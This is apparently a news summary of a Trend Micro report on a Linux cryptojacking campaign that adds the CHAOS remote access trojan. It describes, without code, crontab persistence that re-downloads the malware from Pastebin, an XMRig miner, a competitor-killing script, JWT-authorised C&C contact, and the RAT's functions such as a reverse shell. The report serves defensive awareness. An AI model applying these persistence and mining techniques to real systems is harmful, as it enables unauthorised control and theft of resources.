- Trend Micro intercepted a threat with a slightly different routine and incorporated an advanced remote access trojan.
- The malware achieves its persistence by altering /etc/crontab file, a UNIX task scheduler, and downloads itself every 10 minutes from Pastebin.
- It also downloads an XMRig miner, its configuration file, a shell script looping “competition killer,” and most importantly, the RAT itself.
Trend Micro announced that in November, the team discovered a threat that is using a different routing and using an advanced remote access trojan, CHAOS Remote Administrative Tools, which is based on an open-source project. The malware is capable of terminating competing malware and killing resources that affect cryptocurrency mining performance.
Cryptojacking
To achieve persistence, the malware alters the/etc/crontab file, which is a UNIX task scheduler to download itself every 10 minutes from Pastebin. It also downloads payloads including an XMRig miner, its configuration file, a shell script looping “competition killer,” and the RAT. The payloads and the main downloader script are hosted in different locations. Trend Micros stated that according to the script, the main server, used to download payloads, is located in Russia. The historical whois data shows that it is also used for cloud bulletproof hosting.
The command and control server only provides payloads. Thus, the CHAOS RAT connects to another server, located in Hong Kong according to its IP geolocation. The RAT client connects to the C&C server via its address, and default port, using a JSON Web Token for authorization. When authorization is successful, detailed information about the infected machine is sent to the server using the command /device. The RAT is a Go-compiled binary with the following functions:
- Perform reverse shell
- Download files
- Upload files
- Delete files
- Take screenshots
- Access file explorer
- Gather operating system information
- Restart the PC
- Shutdown the PC
- Open a URL
Trend Micro said,
« On the surface, the incorporation of a RAT into the infection routine of a cryptocurrency mining malware might seem relatively minor. However, given the tool’s array of functions and the fact that this evolution shows that cloud-based threat actors are still evolving their campaigns, it is important that both organizations and individuals stay extra vigilant when it comes to security. In our research on cloud-based cryptocurrency mining groups, we provided several concrete measures and best practices that enterprises can implement to help strengthen their defensive posture. »